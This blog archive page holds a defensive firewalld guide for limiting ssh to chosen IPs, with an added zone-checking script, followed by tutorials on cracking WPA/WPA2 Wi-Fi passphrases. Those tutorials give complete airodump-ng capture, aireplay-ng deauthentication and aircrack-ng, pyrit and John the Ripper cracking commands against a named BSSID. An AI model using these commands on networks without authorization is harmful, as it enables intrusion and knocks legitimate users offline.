Monthly Archives: June 2015


limit ssh to specific hosts with firewalld (firewall-cmd)

Here is a little reminder on how to limit ssh (or any port really) to a specific IP using firewalld:
<code>
systemctl start firewalld.service
systemctl enable firewalld.service
firewall-cmd --zone="trusted" --add-source=<external IP 1>
firewall-cmd --zone="trusted" --add-source=<external IP 1> --permanent
firewall-cmd --zone="trusted" --add-source=<external IP 2>
firewall-cmd --zone="trusted" --add-source=<external IP 2> --permanent
firewall-cmd --zone="trusted" --add-service=ssh
firewall-cmd --zone="trusted" --add-service=ssh --permanent
firewall-cmd --zone="trusted" --list-all
firewall-cmd --zone=public --remove-service=ssh
firewall-cmd --zone=public --remove-service=ssh --permanent
</code>
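To confirm the result, the following added example (not part of the original post) parses zone listings in the format printed by `firewall-cmd --list-all-zones` and names any zone that still offers ssh without a source restriction. The function name, sample listings and addresses are constructed for illustration.

```shell
#!/bin/sh
# Added example (not from the original post): list firewalld zones that offer
# ssh with no source restriction. Input is text in the format printed by
# `firewall-cmd --list-all-zones`; a zone with an empty "sources:" line is
# treated as reachable from any address (a simplifying assumption).

ssh_exposed_zones() {
    awk '
        function report() {
            if (zone != "" && has_ssh && !has_sources) print zone
        }
        # Zone headers start in column 1, e.g. "public (active)".
        /^[^ ]/ { report(); zone = $1; has_ssh = 0; has_sources = 0; next }
        $1 == "sources:"  { if (NF > 1) has_sources = 1 }
        $1 == "services:" { for (i = 2; i <= NF; i++) if ($i == "ssh") has_ssh = 1 }
        END { report() }
    '
}

# Constructed sample: before the change, ssh is open in the public zone.
SAMPLE_BEFORE='public (active)
  target: default
  interfaces: eth0
  sources:
  services: dhcpv6-client ssh

trusted
  target: ACCEPT
  sources:
  services:'

# Constructed sample: after the change (documentation-range addresses).
SAMPLE_AFTER='public (active)
  target: default
  interfaces: eth0
  sources:
  services: dhcpv6-client

trusted (active)
  target: ACCEPT
  sources: 203.0.113.10 198.51.100.7
  services: ssh'

# On a live host: firewall-cmd --list-all-zones | ssh_exposed_zones
printf 'before: %s\n' "$(printf '%s\n' "$SAMPLE_BEFORE" | ssh_exposed_zones)"
printf 'after:  %s\n' "$(printf '%s\n' "$SAMPLE_AFTER" | ssh_exposed_zones)"
```

firewalld's `trusted` zone accepts all connections from its sources by default (target ACCEPT), so the listed addresses can reach every port on the host, not only ssh.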

pyrit – gpu wpa/wpa2 cracking

A little more on cracking wpa/wpa2 passphrases… Why not bring in the GPU? Fun little program called pyrit – it does seem to require a wordfile though, I may have to try piping in JTR like we did with aircrack-ng…

Anyway, here is a little tutorial. Basically you take the cap file you made using airodump-ng and do something like this (this one requires that you have imported passwords into its database):
<code>pyrit --all-handshakes -r WPAcrack-01.cap attack_batch</code>

How about a little aircrack of wpa?

Make sure you own the network/wireless access point or have permission to attack/break in to the WPA network you are attacking before you start. In this case I got permission, and I have several witnesses and documentation to support it.

First do this to find the network:
<code>airodump-ng -i wlan1</code>

Focus in on that one network wap and capture the goodies:
<code>airodump-ng --bssid 00:1E:52:78:AA:5C -c6 --write WPAcrack wlan1</code>

On another interface, do a deauth to force devices to reconnect:
<code>aireplay-ng --deauth 100 -a 00:1E:52:78:AA:5C wlan2</code>

Notice the "WPA handshake: 00:1E:52:78:AA:5C" at the top of the airodump screen? Now crack it with this:
<code>aircrack-ng WPAcrack-01.cap -w /usr/share/wordlists/dirb/big.txt</code>

or by using john the ripper:
<code>john --incremental=all --session=WirelessBrute --stdout | aircrack-ng -a 2 -b 00:1E:52:78:AA:5C WPAcrack-01.cap -w -</code>

Resume works as well:
<code>john --restore=WirelessBrute | aircrack-ng -a 2 -b 00:1E:52:78:AA:5C WPAcrack-01.cap -w -</code>

The other I am doing right now:
<code>john --incremental=all --session=BruteRockSteady</code> […]